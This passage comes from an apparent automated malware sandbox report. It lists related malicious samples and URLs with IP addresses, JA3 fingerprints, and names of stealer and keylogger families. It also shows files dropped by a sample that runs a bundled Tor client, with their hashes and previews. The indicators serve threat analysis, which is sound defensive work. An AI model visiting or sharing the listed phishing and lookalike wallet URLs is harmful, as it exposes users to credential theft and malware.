                                  https://trk.klclick3.com/ls/click?upn=u001.F5FUvNp8lGuVBrfF8VWSt-2Befrq4JwHZUrXxYUllvBu6JQLRTleNqoOq9cK2V6H9nF6TE8i5ai18ELwuaCRLRwA-3D-3DeBON_1svWsHF9QtKh6I35BSRfJziCtreSweSmmjNgxUuzWxLFgb12Ddkvv3gPW-2BY7HCV4BtwDYPCgqFm6ezf3LGkFgw-2FasXzQ01tiusM7qj7f7wQzyFpk04U-2BNsOiH-2B6C0IEGGhuBHlH4nFGk5hM1YrilA-2FklNstU7j1vcFJG8iHzTeSRYHOXIpK0cVyPDdeQeDUKiYrTYys-2FJ6BSjWfQuGIzI8V57VImtAPAAkrpuUD31VELoL-2FwLqoqcEcJaE-2B6fpm2wPTZkCul8wgxqc4qQClvNSQEUdlWOW-2BnsmWvhHzUvBgdPRhNpiRMg8ZZ-2BBQBoSFlRkufcGBk8zdT6H-2B-2FULHcbxzCKE71NmfbhvHZ7lmXl2A-3DGet hashmaliciousTycoon2FABrowse
                                  • 140.82.121.3
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.28268.20656.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.9
                                  SecuriteInfo.com.Win32.Malware-gen.6320.5781.exeGet hashmaliciousXmrigBrowse
                                  • 140.82.121.5
                                  http://tokelp0cket.top/Get hashmaliciousUnknownBrowse
                                  • 140.82.121.6
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  SecuriteInfo.com.FileRepMalware.29211.10793.exeGet hashmaliciousUnknownBrowse
                                  • 140.82.121.4
                                  https://exodus-wllet.github.io/Get hashmaliciousUnknownBrowse
                                  • 140.82.114.22
                                  https://suryapratap06.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                  • 140.82.112.17

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://cdp3.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNzJlOTY4NTBhOWZiNGE2ZWE0MGY0N2JjMzQ0NzQxOWIiLCJjcmVhdGlvbl90aW1lIjoxNzIxNzI5NzE0LCJtZXNzYWdlX2lkIjoiMGhtbWRwZ3d4ejU5cTJiZzU4eWRhem01I2ViOTU2OGFlLTUxMDEtNDRmOC1iYmM1LWNkYjdhMTU0MmZhOCIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzUzMjY1NzE0LCJyZWRpcmVjdF91cmwiOiJodHRwczovL21hY3Bob3RvZ3JhcGh5Lm9yZyIsImluZGl2aWR1YWxfaWQiOiIwMFFhbTAwMDAwQTVaYzVFQUYifQ.n1MJx5qXzIyes_2paKdgiE1L8vPLZY6s0PjxhlIpfl0Get hashmaliciousHTMLPhisherBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Frutas Nuevo Orden.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  NATV0980090004.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Cotizaci#U00f3n.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  Doc_322_0105.exeGet hashmaliciousAgentTeslaBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 185.199.108.133
                                  • 149.154.167.220
                                  • 140.82.121.3
                                  • 199.188.200.89

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll7h2eHzSa61.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                    file.exeGet hashmaliciousGurcu StealerBrowse
                                      SqhpdzwbpB.exeGet hashmaliciousGurcu StealerBrowse
                                        jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                          vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                            RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                              NxrkCS4fDD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                7WOfaFsPQv.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                  Rgi3BxJNQJ.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRATBrowse
                                                    2y1JbYuXUD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                      C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll7h2eHzSa61.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                                        file.exeGet hashmaliciousGurcu StealerBrowse
                                                          SqhpdzwbpB.exeGet hashmaliciousGurcu StealerBrowse
                                                            jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                              vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                  NxrkCS4fDD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                    7WOfaFsPQv.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                      Rgi3BxJNQJ.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRATBrowse
                                                                        2y1JbYuXUD.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\p.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:D:D
                                                                          MD5:B19AA25FF58940D974234B48391B9549
                                                                          SHA1:24557894C02F75B94D15DE2291E863852773D98B
                                                                          SHA-256:7929065522441D4053CBA7EBFFB2D224585A110B13840FF69CF0E89B725AF9E7
                                                                          SHA-512:1240F82A2FDF0EBF392D4D3A558338B9767753D73CD5C010FD5B959F89E0276506C287A480D7B7B278B76B28B462EC682AD9B01BE327565704C8C4C05EFABE0F
                                                                          Malicious:false
                                                                          Preview:2789

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\report.lock

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:modified
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-certs (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):13668
                                                                          Entropy (8bit):6.049720858632598
                                                                          Encrypted:false
                                                                          SSDEEP:384:YMY4JVtG1hIcCyf/40VVq1h8PXt2h4YVc1h19U4uWVxJ1herWd24VdzVH591hFst:mELGf/HJiO96xyhC5WLJ4G26ZJQlSyLT
                                                                          MD5:6E33D0EF7D459A62A60AA5DE8760B35A
                                                                          SHA1:278C0FD656F9BA3ED4FCD181D8827516479A5D34
                                                                          SHA-256:59CBCB153D32F2B054574DB67E1388D6773F43073A3C13279CCACC5437C0129F
                                                                          SHA-512:3080CC343449133FFDDA7796790510DF2F8DB85DA57E6E1E8B9297749BB01777072769E0E40D4980A570B32A9F513453B64E5D70B1C3639989649AD39C2D8962
                                                                          Malicious:false
                                                                          Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2024-05-03 13:08:12..dir-key-expires 2025-05-03 13:08:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvw0tPel/aew1u6MA7JdxIsH5SEtj2yIexRYmAqxSv1Vmrknmr9rx..QC4NqGZh3zZaHgcn7k6pIXWHsMhlGSwJ6NE/xaG8upNJtRf3xBfpmTgfN9qJ4GjC..RS/jTHdYV9PtGrQ8BAbsUA205w2J

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-certs.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):13668
                                                                          Entropy (8bit):6.049720858632598
                                                                          Encrypted:false
                                                                          SSDEEP:384:YMY4JVtG1hIcCyf/40VVq1h8PXt2h4YVc1h19U4uWVxJ1herWd24VdzVH591hFst:mELGf/HJiO96xyhC5WLJ4G26ZJQlSyLT
                                                                          MD5:6E33D0EF7D459A62A60AA5DE8760B35A
                                                                          SHA1:278C0FD656F9BA3ED4FCD181D8827516479A5D34
                                                                          SHA-256:59CBCB153D32F2B054574DB67E1388D6773F43073A3C13279CCACC5437C0129F
                                                                          SHA-512:3080CC343449133FFDDA7796790510DF2F8DB85DA57E6E1E8B9297749BB01777072769E0E40D4980A570B32A9F513453B64E5D70B1C3639989649AD39C2D8962
                                                                          Malicious:false
                                                                          Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2024-05-03 13:08:12..dir-key-expires 2025-05-03 13:08:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvw0tPel/aew1u6MA7JdxIsH5SEtj2yIexRYmAqxSv1Vmrknmr9rx..QC4NqGZh3zZaHgcn7k6pIXWHsMhlGSwJ6NE/xaG8upNJtRf3xBfpmTgfN9qJ4GjC..RS/jTHdYV9PtGrQ8BAbsUA205w2J

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdesc-consensus (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (1006)
                                                                          Category:dropped
                                                                          Size (bytes):2717514
                                                                          Entropy (8bit):5.608451164793479
                                                                          Encrypted:false
                                                                          SSDEEP:12288:HGs48rhSKnKecfI4He1Ag+lficC23TcSJR8NwCNv4VqBU7keaRt/f1QVgRXz:g4hSKnBkUd29GNws4oBc+dNRD
                                                                          MD5:25B77A84D941167527B4073195CB2BCC
                                                                          SHA1:BDEE047E42622F49D58594AAAD01300BE7C35D34
                                                                          SHA-256:5347DCBF1BE0D63ACCE745341864CC2C5BAB82249D745BB745CC26A0ECEB40EA
                                                                          SHA-512:A2D36134C52D8916BC50A72DB3CF0344F7379A17B22220C41D3B4113B2D865F4470D6BC3B06C1E1779B6838212FF399461B5CDD602875E74F0130A4B595D12F2
                                                                          Malicious:false
                                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-07-23 13:00:00.fresh-until 2024-07-23 14:00:00.valid-until 2024-07-23 16:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthD

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdesc-consensus.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (1006)
                                                                          Category:dropped
                                                                          Size (bytes):2717514
                                                                          Entropy (8bit):5.608451164793479
                                                                          Encrypted:false
                                                                          SSDEEP:12288:HGs48rhSKnKecfI4He1Ag+lficC23TcSJR8NwCNv4VqBU7keaRt/f1QVgRXz:g4hSKnBkUd29GNws4oBc+dNRD
                                                                          MD5:25B77A84D941167527B4073195CB2BCC
                                                                          SHA1:BDEE047E42622F49D58594AAAD01300BE7C35D34
                                                                          SHA-256:5347DCBF1BE0D63ACCE745341864CC2C5BAB82249D745BB745CC26A0ECEB40EA
                                                                          SHA-512:A2D36134C52D8916BC50A72DB3CF0344F7379A17B22220C41D3B4113B2D865F4470D6BC3B06C1E1779B6838212FF399461B5CDD602875E74F0130A4B595D12F2
                                                                          Malicious:false
                                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-07-23 13:00:00.fresh-until 2024-07-23 14:00:00.valid-until 2024-07-23 16:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthD

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\cached-microdescs.new

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (16050)
                                                                          Category:dropped
                                                                          Size (bytes):19629594
                                                                          Entropy (8bit):4.844513725137488
                                                                          Encrypted:false
                                                                          SSDEEP:24576:LyHJuBfheKEZ3aBKenGd3gwbA6IFphYgXC37IHn5jG1/tJNDf9ax01a7XlVWXH1g:ZT6DqPzsLHuY3pZ4iC1lpZYq
                                                                          MD5:59704A2369BC1C2AAE6D79E22ABCD606
                                                                          SHA1:4C77600ABC5DF2599AE236ED875F122B53E32A5F
                                                                          SHA-256:D65B76E9D62FD7EEE29E4F0127EFC51966F8E4413859F64AF7313DC1B17D8D66
                                                                          SHA-512:B4D0873EEF59B86DCF4B6A2FB19A0FD37FD6A6DDA79BA3C62A4BB133043480EB8A33DB2493E986E6007651633078F3E7C302EC9AC6ED5E7FBF8E7C8863BA792D
                                                                          Malicious:false
                                                                          Preview:@last-listed 2024-07-23 13:47:20.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAJoBdlbkRUt7p5I23tmTwx3PXwOFy6Cah3v778ixbqIuCezXDnB0J0QN.SbjlBTNS8Y1/+V+sOWdv0MT4EDZiHfLXUI/rA0fEe2Qz0WUesKwCoPJ7WXlR6Z+u.yg5mhsC/DlE07JCsqmM1GH0VTrUkt400T52eRgqogGGKsxL0KOCRAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key qOViKoD874Fezs+hSh+fXS1LsdUmwOU0xv4DnLkdixc.id ed25519 84uy+GOf0kZ/zif8Mh6sAxUR/uYFh1YhINv4Tuip2jk.@last-listed 2024-07-23 13:47:20.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAPXrWOZfR/x6NjGjpvS+TArHXr3cmBgAM+Y0DLq/1SiyLGs2snZ/jBPO.MRHluSQ4dQMxUTp/OCWuCvxUzSc3YdwfLiwXagUFkh/Zb4LMLYpcV1BaJqL89ahr.E0MJK6V1++xhSNNZOLnQwWQ39i4pn98IgDlfrj+3SN8auwoVlfRBAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key 0cpfQdAMa3T/LycWAqfdEu88YaY5mO1oUNxO/pNLADs.family $4E9B9BE2C87DFA3BBCF8B4907F750E326A2BD2D4 $506600D9FBACE4D2D559C869D8516D4A74DBBD22 $A0298C0A9A045F1449C07929C7DD91E41C7F95B2 $C7865D58EEFE96B92333E3C8BE3C0AAAA0000EEF.id ed25519 iIrMZZeWCDRiB51oE9Em2thecMzvbZaoz819nnRNdKA.@last-lis

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\state (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (354), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4399
                                                                          Entropy (8bit):5.282823959019943
                                                                          Encrypted:false
                                                                          SSDEEP:48:cSrN2DU4/sP+9qu4bVFNkaPjpLUHt4RS7TYpkb30QBvHrX6S+n:BIDU4/iIquGV8EFyt4RWTMXaLXt2
                                                                          MD5:B47682D93A66C5FFB868CC230ACD9993
                                                                          SHA1:6F93ED55B4B3131D768038E5E42F915E0ED58E4F
                                                                          SHA-256:31935D4B556C4BDE8E2116D80CB79C325AF826B07119BC74D9118A5E07815F11
                                                                          SHA-512:A9ED11169942A2DDC4256C0F6172DA1D0E428F999A3EE1EFABD7015C6191F2498E9E3F15A4E6BDAAE6A2473544BFDEDDA62622145F4EC24C22E7FA3B1171D5A0
                                                                          Malicious:false
                                                                          Preview:# Tor state file last generated on 2024-07-23 09:49:45 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 575 1..CircuitBuildTimeBin 625 2..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 1..CircuitBuildTimeBin 875 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1125 5..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1275 4..CircuitBuildTimeBin 1325 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 2..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2525 1..Dormant 0..Guard in=default rsa_id=0A8FB5E28FFE1DB020F2E37410B25ACA7367D8E9 nickname=bu11seye sampled_on=2024-07-23T00:06:35 sampled_idx=0 sampled_by=0.4.5.10 listed=1 confirmed_on=2024-07-18T04:20:50 confirmed_idx=0 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=14.000000 pb_circ_successes=14.000000 pb_successf

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\state.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (354), with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):4399
                                                                          Entropy (8bit):5.282823959019943
                                                                          Encrypted:false
                                                                          SSDEEP:48:cSrN2DU4/sP+9qu4bVFNkaPjpLUHt4RS7TYpkb30QBvHrX6S+n:BIDU4/iIquGV8EFyt4RWTMXaLXt2
                                                                          MD5:B47682D93A66C5FFB868CC230ACD9993
                                                                          SHA1:6F93ED55B4B3131D768038E5E42F915E0ED58E4F
                                                                          SHA-256:31935D4B556C4BDE8E2116D80CB79C325AF826B07119BC74D9118A5E07815F11
                                                                          SHA-512:A9ED11169942A2DDC4256C0F6172DA1D0E428F999A3EE1EFABD7015C6191F2498E9E3F15A4E6BDAAE6A2473544BFDEDDA62622145F4EC24C22E7FA3B1171D5A0
                                                                          Malicious:false
                                                                          Preview:# Tor state file last generated on 2024-07-23 09:49:45 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 575 1..CircuitBuildTimeBin 625 2..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 1..CircuitBuildTimeBin 875 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1125 5..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1275 4..CircuitBuildTimeBin 1325 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 2..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2525 1..Dormant 0..Guard in=default rsa_id=0A8FB5E28FFE1DB020F2E37410B25ACA7367D8E9 nickname=bu11seye sampled_on=2024-07-23T00:06:35 sampled_idx=0 sampled_by=0.4.5.10 listed=1 confirmed_on=2024-07-18T04:20:50 confirmed_idx=0 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=14.000000 pb_circ_successes=14.000000 pb_successf

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\unverified-microdesc-consensus (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (1006)
                                                                          Category:dropped
                                                                          Size (bytes):2717514
                                                                          Entropy (8bit):5.608451164793479
                                                                          Encrypted:false
                                                                          SSDEEP:12288:HGs48rhSKnKecfI4He1Ag+lficC23TcSJR8NwCNv4VqBU7keaRt/f1QVgRXz:g4hSKnBkUd29GNws4oBc+dNRD
                                                                          MD5:25B77A84D941167527B4073195CB2BCC
                                                                          SHA1:BDEE047E42622F49D58594AAAD01300BE7C35D34
                                                                          SHA-256:5347DCBF1BE0D63ACCE745341864CC2C5BAB82249D745BB745CC26A0ECEB40EA
                                                                          SHA-512:A2D36134C52D8916BC50A72DB3CF0344F7379A17B22220C41D3B4113B2D865F4470D6BC3B06C1E1779B6838212FF399461B5CDD602875E74F0130A4B595D12F2
                                                                          Malicious:false
                                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-07-23 13:00:00.fresh-until 2024-07-23 14:00:00.valid-until 2024-07-23 16:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthD

                                                                          C:\Users\user\AppData\Local\77rh3rhsc7\tor\data\unverified-microdesc-consensus.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (1006)
                                                                          Category:dropped
                                                                          Size (bytes):2717514
                                                                          Entropy (8bit):5.608451164793479
                                                                          Encrypted:false
                                                                          SSDEEP:12288:HGs48rhSKnKecfI4He1Ag+lficC23TcSJR8NwCNv4VqBU7keaRt/f1QVgRXz:g4hSKnBkUd29GNws4oBc+dNRD
                                                                          MD5:25B77A84D941167527B4073195CB2BCC
                                                                          SHA1:BDEE047E42622F49D58594AAAD01300BE7C35D34
